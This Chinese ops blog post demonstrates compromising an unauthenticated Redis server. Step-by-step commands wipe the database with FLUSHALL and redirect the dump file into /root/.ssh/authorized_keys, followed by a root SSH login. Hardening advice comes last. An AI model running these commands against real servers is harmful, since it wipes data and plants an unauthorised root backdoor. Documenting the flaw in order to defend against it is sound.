redis的一次持久化入侵
2016/02/19 21:54 于 安全 2
这根据redis持久化可生成文件,而且redis可以指定生成文件的位置和名称的bug下,恰巧你的redis里面只有一个key而且是一个ssh公钥,而且你指定持久化文件名“authorized_keys”生成位置是“/root/.ssh/”,这样那个拥有私钥的人就可以无密钥登录root了
1.生成密钥
[root@saltstack-node2~]# (echo -e "\n\n";cat .ssh/id_rsa.pub;echo "\n\n")
>/tmp/foo.txt
[root@saltstack-node2~]# cat /tmp/foo.txt
ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEA0rfmYdQvgw/fmrKMj2nRV5FMucTAlv+J49Yu2MRsC9v0ORkesquGShvM/KuIM0P4yMS/l5/N/AzC3X76QJm3XeckuZdpo7KhZGuWGb76n4LrDf1UekagYW7dmW9f2WXnRrxnhl64N3DOeH9A2mD/mRrNrrJ+yyVUjbG9fM+FzOU8mYf7rqvLzqO2ppHYpPj9T5sR8E4bZpYBCQT9JXlA1N3y48LUGUqE5AuUKYEc6wyJCvPxaPWa8Ss03+zaVyF7ly+dje+3sDF1n8DvwveLaXV8BPfGB5bVG4kEtIhiWmWR+ITnLyzLzle2292+BtgfOrKOopk8TlBIhjVzl1LOJQ==
root@xxx.example.com
\n\n2.清空redis
清空redis:
127.0.0.1:6379>
FLUSHALL
OK3.写一个key
[root@saltstack-node2~]# cat /tmp/foo.txt |redis-cli -x set pwn
OK4.对已知redis进行修改配置
127.0.0.1:6379>
CONFIG set dir /root/.ssh
OK
127.0.0.1:6379>config set dbfilename "authorized_keys"
OK
127.0.0.1:6379>
save
OK
127.0.0.1:6379>
exit5.可以登录了
[root@saltstack-node2~]# ssh 192.168.81.129
The authenticity of
host '192.168.81.129 (192.168.81.129)' can't be established.
RSA key fingerprint
is 7d:c4:f0:37:1e:ba:da:90:56:8b:fa:ee:df:d0:3f:22.
Are you sure you
want to continue connecting (yes/no)? yes
Warning: Permanently
added '192.168.81.129' (RSA) to the list of known hosts.
Last login: Wed Nov
11 03:18:23 2015 from 192.168.81.1
[root@saltstack-node2~]#预防措施:
1.不以root或者其它可登录用户启动(用低级权限启动)
2.修改配置增加密码认证
requirepass password
3.绑定内网IP不对外访问
bind 192.168.0.5
4.去除redis里面可进行系统入侵的命令
rename command
FLUSHALL ""
rename command
FLUSHDB ""
rename command
CONFIG
rename command EVAL微信扫描二维码了解更多 ->
[运维博客]
redis的一次持久化入侵 http://new.nginxs.net/read.php/hello-world/
